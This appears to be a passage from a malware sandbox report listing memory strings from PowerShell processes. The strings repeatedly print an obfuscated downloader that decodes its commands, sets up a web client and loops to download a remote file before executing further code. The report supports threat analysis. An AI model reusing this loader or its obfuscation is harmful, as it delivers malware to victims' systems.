Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT i
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ure) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indband
              Source: powershell.exe, 00000005.00000002.2196688153.0000000002B3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msilIndbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)
              Source: powershell.exe, 00000002.00000002.2489622695.0000020B74A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedea
              Source: powershell.exe, 00000002.00000002.2490651768.0000020B74B9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde)
              Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(K
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
              Source: powershell.exe, 00000005.00000002.2202717320.00000000073F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +%SystemRoot%\System32\mswsock.dllt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.er.slNA.e.kt.E
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFCA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
              Source: powershell.exeBinary or memory string: yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl 